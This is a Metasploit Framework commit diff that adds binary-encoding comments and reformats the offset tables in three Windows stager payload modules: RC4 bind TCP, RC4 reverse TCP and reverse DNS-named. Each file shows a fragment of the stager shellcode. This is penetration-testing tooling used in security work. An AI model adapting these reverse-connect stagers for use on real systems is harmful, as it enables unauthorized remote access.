Break up long lines and add magic encoding comment

unstable
James Lee 2013-04-09 17:07:17 -05:00
parent b3c78f74d2
commit 6c980981db
3 changed files with 25 additions and 3 deletions

View File

@ -1,3 +1,4 @@
# -*- coding: binary -*-
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
@ -32,7 +33,12 @@ module Metasploit3
'Stager' =>
{
'RequiresMidstager' => false,
'Offsets' => { 'LPORT' => [ 200, 'n' ], 'XORKey' => [ 260, '' ], 'RC4Key' => [ 324, '' ] },
'Offsets' =>
{
'LPORT' => [ 200, 'n' ],
'XORKey' => [ 260, '' ],
'RC4Key' => [ 324, '' ]
},
'Payload' =>
# Length: 411 bytes
"\xFC\xE8\x89\x00\x00\x00\x60\x89\xE5\x31\xD2\x64\x8B\x52\x30\x8B" +

View File

@ -1,3 +1,4 @@
# -*- coding: binary -*-
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
@ -32,7 +33,14 @@ module Metasploit3
'Stager' =>
{
'RequiresMidstager' => false,
'Offsets' => { 'LHOST' => [ 197, 'ADDR' ], 'LPORT' => [ 204, 'n' ], 'ReverseConnectRetries' => [ 195, 'C'], 'XORKey' => [ 252, '' ], 'RC4Key' => [ 316, '' ] },
'Offsets' =>
{
'LHOST' => [ 197, 'ADDR' ],
'LPORT' => [ 204, 'n' ],
'ReverseConnectRetries' => [ 195, 'C'],
'XORKey' => [ 252, '' ],
'RC4Key' => [ 316, '' ],
},
'Payload' =>
# Length: 403 bytes
"\xFC\xE8\x89\x00\x00\x00\x60\x89\xE5\x31\xD2\x64\x8B\x52\x30\x8B" +

View File

@ -1,3 +1,4 @@
# -*- coding: binary -*-
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
@ -32,7 +33,14 @@ module Metasploit3
'Stager' =>
{
'RequiresMidstager' => false,
'Offsets' => { 'HostName' => [ 248, '' ], 'LPORT' => [ 212, 'n' ], 'ReverseConnectRetries' => [ 207, 'C'], 'XORKey' => [ 329, '' ], 'RC4Key' => [ 393, '' ] },
'Offsets' =>
{
'HostName' => [ 248, '' ],
'LPORT' => [ 212, 'n' ],
'ReverseConnectRetries' => [ 207, 'C'],
'XORKey' => [ 329, '' ],
'RC4Key' => [ 393, '' ]
},
'Payload' =>
# Name: stager_reverse_tcp_rc4_dns
# Length: 480 bytes